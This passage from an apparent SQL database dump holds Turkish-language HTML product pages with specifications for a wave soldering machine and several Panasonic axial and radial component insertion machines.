width=\"354\">Dijital Kontrol</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ccedil;alışma Sıcaklığı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">200~350&deg;C</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Dalga Y&uuml;ksekliği</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">5-15 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Lehim Kapasitesi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">55kg</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Flux Sistemi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">K&ouml;p&uuml;k (Foam) - 3lt</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Infrared</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Zamanlaması</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">600 sn kadar ayarlanabilir</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Maksimum PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">200x270 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Pota Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Dalgalı Titanyum Pota</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Pota Erime S&uuml;resi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">45&nbsp;Dakika</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Taşıyıcı Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Titanyum Tırnaklı Palet</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r Hızı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">0.5-2 m/dk.&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">G&uuml;&ccedil; Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">AC 220V 50HZ</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Maksimum&nbsp;G&uuml;&ccedil; T&uuml;ketimi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">5.0kW</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Boyutları</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1230 x&nbsp;560&nbsp;x&nbsp;400 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">95kg (lehim hari&ccedil;)</td>\r\n</tr>\r\n</tbody>\r\n</table>','LFS-1','','','','lfs-1'),(17,'Axial Insertion','<h2 style=\"text-align: left;\">Panasonic Axial Insertion Machine - AVB</h2>\r\n<h2 style=\"text-align: left;\"><img src=\"images/2el/avb.jpg\" alt=\"\" width=\"300\" border=\"0\" /></h2>\r\n<h2>&nbsp;</h2>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li style=\"text-align: left;\">Aksiyel bacaklı malzemeleri istenilen bacak aralığı ve y&uuml;kseklikte dizer</li>\r\n<li style=\"text-align: left;\">Delik pozisyonlarının kamera sistemi ile doğrulanması yapılır</li>\r\n<li style=\"text-align: left;\">5mm kalınlık ve 20mm\'nin &uuml;zerinde g&ouml;ve uzunluğuna sahip malzemeler dizebilir</li>\r\n<li style=\"text-align: left;\">26 veya 52mm lik şeritler doğrudan makineye bağlanabilir.</li>\r\n<li style=\"text-align: left;\">Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır.</li>\r\n<li style=\"text-align: left;\">Kısa devre teli dizmek i&ccedil;in &ouml;zel besleyici &uuml;nitesi</li>\r\n</ul>\r\n<div>\r\n<div>&nbsp;</div>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/avb-arka.jpg\" alt=\"\" width=\"200\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-head.jpg\" alt=\"\" width=\"100\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/2el/avb-feeder.jpg\" alt=\"\" width=\"200\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-monitor.jpg\" alt=\"\" width=\"100\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><img src=\"images/2el/avb-komp.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC AVB</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-2011B</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>508x381mm (max.) </div>\r\n<div>90x &nbsp;60mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>508x371mm (max.)</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>1&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>\r\n<div>48+Jumper Wire (26mm şerit)</div>\r\n<div>24+Jumper Wire (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>\r\n<div>0.48 sn/malzeme (26mm şerit)</div>\r\n<div>0.68 sn/malzeme (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>0 - 5mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>5 - 26mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">\r\n<p>Kesme ve</p>\r\n<p>Per&ccedil;inlemeMetodu</p>\r\n</td>\r\n<td width=\"83\" height=\"25\">Per&ccedil;inleme BacakUzunlu&Auml;u</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Panadac 783A controller; DC servomotorlu yarı&nbsp;kapalı &ccedil;evrim kontrol, CRT monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 80N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>5.7KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>5900 x 1750 x 1460mm</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>2250kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h2>Dizilebilir Komponentler</h2>\r\n<h2>(26mm veya 52mm genişliğinde şerit &uuml;zerimde)</h2>\r\n<h2>&nbsp;</h2>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Karbon Diren&ccedil;ler</li>\r\n<li style=\"text-align: left;\">Silindirik seramik kapasiteler</li>\r\n<li style=\"text-align: left;\">Diyotlar</li>\r\n<li style=\"text-align: left;\">G&uuml;&ccedil; diren&ccedil;leri, vs</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n</div>','AVB','','','','avb'),(18,'Axial Insertion','<h2 style=\"text-align: left;\">Panasonic Axial Insertion Machine - AVF</h2>\r\n<h2 style=\"text-align: left;\"><img src=\"images/2el/avb.jpg\" alt=\"\" width=\"300\" border=\"0\" /></h2>\r\n<h2>&nbsp;</h2>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li style=\"text-align: left;\">Aksiyel bacaklı malzemeleri istenilen bacak aralığı ve y&uuml;kseklikte dizer</li>\r\n<li style=\"text-align: left;\">Delik pozisyonlarının kamera sistemi ile doğrulanması yapılır</li>\r\n<li style=\"text-align: left;\">5mm kalınlık ve 20mm\'nin &uuml;zerinde g&ouml;ve uzunluğuna sahip malzemeler dizebilir</li>\r\n<li style=\"text-align: left;\">26 veya 52mm lik şeritler doğrudan makineye bağlanabilir.</li>\r\n<li style=\"text-align: left;\">Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır.</li>\r\n<li style=\"text-align: left;\">Kısa devre teli dizmek i&ccedil;in &ouml;zel besleyici &uuml;nitesi</li>\r\n</ul>\r\n<div>\r\n<div>&nbsp;</div>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/avb-arka.jpg\" alt=\"\" width=\"200\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-head.jpg\" alt=\"\" width=\"100\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/2el/avb-feeder.jpg\" alt=\"\" width=\"200\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-monitor.jpg\" alt=\"\" width=\"100\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><img src=\"images/2el/avb-komp.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC AVF</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-2011F</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>508x381mm (max.) </div>\r\n<div>90x &nbsp;60mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>508x371mm (max.)</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>1&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>\r\n<div>48+Jumper Wire (26mm şerit)</div>\r\n<div>24+Jumper Wire (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>\r\n<div>0.48 sn/malzeme (26mm şerit)</div>\r\n<div>0.68 sn/malzeme (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>0 - 5mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>5 - 26mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">\r\n<p>Kesme ve</p>\r\n<p>Per&ccedil;inlemeMetodu</p>\r\n</td>\r\n<td width=\"83\" height=\"25\">Per&ccedil;inleme BacakUzunlu&Auml;u</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Panadac 783A controller; DC servomotorlu yarı&nbsp;kapalı &ccedil;evrim kontrol, CRT monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 80N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>5.7KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>5900 x 1750 x 1460mm</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>2250kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h2>Dizilebilir Komponentler</h2>\r\n<h2>(26mm veya 52mm genişliğinde şerit &uuml;zerimde)</h2>\r\n<h2>&nbsp;</h2>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Karbon Diren&ccedil;ler</li>\r\n<li style=\"text-align: left;\">Silindirik seramik kapasiteler</li>\r\n<li style=\"text-align: left;\">Diyotlar</li>\r\n<li style=\"text-align: left;\">G&uuml;&ccedil; diren&ccedil;leri, vs</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n</div>','AVF','','','','avf'),(19,'Radial Insertion','<h2 style=\"text-align: left;\">Panasonic Radial Insertion Machine - RH6</h2>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/2el/rh6.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n<td style=\"font-size: 10px;\"><img src=\"images/2el/rh6-arka.jpg\" alt=\"\" width=\"250\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li style=\"text-align: left;\">40 farklı &ccedil;eşit radyal malzeme tek bir makine ile dizilebilir.</li>\r\n<li style=\"text-align: left;\">Malzeme dizgisi iki y&ouml;nde (0&deg;, 90&deg;)</li>\r\n<li style=\"text-align: left;\">Yaklaşık 0.6 saniye/malzeme dizgi hızı</li>\r\n</ul>\r\n<div class=\"O\" style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\r\n<div style=\"text-align: left;\"><img src=\"images/2el/rh6-komp.jpg\" alt=\"\" width=\"250\" /></div>\r\n</div>\r\n<div>\r\n<ul>\r\n<li style=\"text-align: left;\">V cut metodu k&uuml;&ccedil;&uuml;k &ccedil;aplı deliklerde dahi daha kararlı bir dizgi sağlar</li>\r\n<li style=\"text-align: left;\">\r\n<div>Hatalı dizilen malzemenin tekrar dizilebilmesi i&ccedil;in hatalı malzemeyi &ccedil;ıkartmak yeterlidir</div>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<div>Y&uuml;ksek g&uuml;venilirlikli malzeme kasetleriyle kararlı bir malzeme beslemesi sağlar ve malzeme değişimi&nbsp;olduk&ccedil;a kolaydır</div>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<div>Kılavuz Pin Sistemi ile malzeme uygun pozisyondaki her yere dizilebilir</div>\r\n</li>\r\n<li>\r\n<div style=\"text-align: left;\">2.5 ve 5 mm olarak iki farklı bacak aralıklı malzeme dizgi metodu mevcuttur</div>\r\n</li>\r\n</ul>\r\n</div>\r\n<table border=\"0\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/rh6-head.jpg\" alt=\"\" width=\"200\" border=\"0\" /></td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>&nbsp;</h2>\r\n<div style=\"text-align: left;\"><img src=\"images/2el/rh6-angle.jpg\" alt=\"\" width=\"300\" border=\"0\" /></div>\r\n<div class=\"O\" style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</div>\r\n<h2 class=\"O\" style=\"font-size: 14px; font-family: Arial, Helvetica, sans-serif; font-weight: normal; color: #333333; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</h2>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC RH6</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-8201</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>330x250mm (max.)</div>\r\n<div>150x80mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>\r\n<div>330x240mm (max.)</div>\r\n<div>150x70mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td colspan=\"2\">Kart Transfer S&uuml;resi (sn)</td>\r\n<td>~4.5sn</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>40</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>0.6</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>16</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>2.5 veya 5.0</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">Kesme vePer&ccedil;inlemeMetodu</td>\r\n<td>Per&ccedil;inleme Bacak&nbsp;Uzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Panadac 770 microcomputer; X, Y ve Z eksenleri&nbsp;DC servomotorlu yarı kapalı &ccedil;evrim kontrol</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 250N/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>2.3 KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>3860 x 1590 x 1845mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Ağırlık</td>\r\n<td>1750kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<h3 class=\"O\" style=\"text-align: left;\"><span>Dizilebilir Komponentler</span></h3>\r\n<h3 class=\"O\" style=\"text-align: left;\"><span>(12.7 mm aralıklı şerit &uuml;zerinde)</span></h3>\r\n<ul>\r\n<li style=\"text-align: left;\"><span></span>K&uuml;&ccedil;&uuml;k Komponentler (LCD:2.5mm);&nbsp;Seramik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-5mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-6.3mm),&nbsp;radyal bacaklı diren&ccedil;ler, vb</li>\r\n<li style=\"text-align: left;\">Standart Komponentler&nbsp;(LCD:5mm);&nbsp;Seramik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-11mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-10mm),&nbsp;Film Kapasit&ouml;rler (3W-12W), radyal bacaklı diren&ccedil;ler, transist&ouml;rler (TO-92), vb</li>\r\n<li style=\"text-align: left;\">Diğerleri; LED\'er, k&uuml;&ccedil;&uuml;k dik diren&ccedil;ler, potansiyometreler, basmalı switchler, ayarlı kapasit&ouml;rler, radyal&nbsp;bobinler, SIP IC\'ler, vb&nbsp;</li>\r\n</ul>\r\n<p>&nbsp;</p>','RH6','','','','rh6'),(20,'Radial Insertion','<h2 style=\"text-align: left;\">Panasonic Radial Insertion Machine - RHII</h2>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/rh2.jpg\" alt=\"\" width=\"300\" height=\"220\" /></td>\r\n<td><img src=\"images/2el/rh2-arka.jpg\" alt=\"\" width=\"300\" height=\"225\" />&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Genel &Ouml;zellikler</h2>\r\n<ul>\r\n<li>\r\n<div style=\"text-align: left;\">Delik pozisyonlarının kamera sistemi ile tanımlanması</div>\r\n</li>\r\n<li style=\"text-align: left;\">62 farklı &ccedil;eşit radyal malzeme i&ccedil;in besleme slotları</li>\r\n<li style=\"text-align: left;\">Yaklaşık 0.45 saniye/malzeme dizgi hızı</li>\r\n<li style=\"text-align: left;\">Servo motor kontrol sistemi ile daha kararlı ve sessiz &ccedil;alışma</li>\r\n<li style=\"text-align: left;\">Kılavuz pin sistemi ile y&uuml;ksek yoğunlukta dizgi ve 0.45 saniye/malzeme hıza ulaşır</li>\r\n<li style=\"text-align: left;\">V cut metodu k&uuml;&ccedil;&uuml;k &ccedil;aplı deliklerde dahi daha kararlı bir dizgi sağlar</li>\r\n<li style=\"text-align: left;\">Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden&nbsp;dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır</li>\r\n<li style=\"text-align: left;\">2.5 ve 5 mm bacak aralıklı malzemeler 21mm y&uuml;ksekliğe kadar monte edilebilir-</li>\r\n</ul>\r\n<p>-</p>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<div><img src=\"images/2el/rh2-head.jpg\" alt=\"\" width=\"200\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td><br />\r\n<div><img src=\"images/2el/rh2-komp.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td><br />\r\n<div><img src=\"images/2el/rh2-feeder.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>&nbsp;</h2>\r\n<h2>&nbsp;</h2>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC RHII</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-8821</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>330x250mm (max.)</div>\r\n<div>150x80mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>\r\n<div>330x240mm (max.)</div>\r\n<div>150x70mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>0.95&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>62 (Max)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Dizgi Hızı (sn/malzeme)</td>\r\n<td>0.45 / 0.6 / 0.8</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme G&ouml;vde Boyutu (mm)</td>\r\n<td>&Atilde;3 ile&nbsp;&Atilde;13</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td >21</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>2.5 veya 5.0</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">Kesme vePer&ccedil;inlemeMetodu</td>\r\n<td>Per&ccedil;inleme Bacak&nbsp;Uzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td width=\"83\" height=\"15\">B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 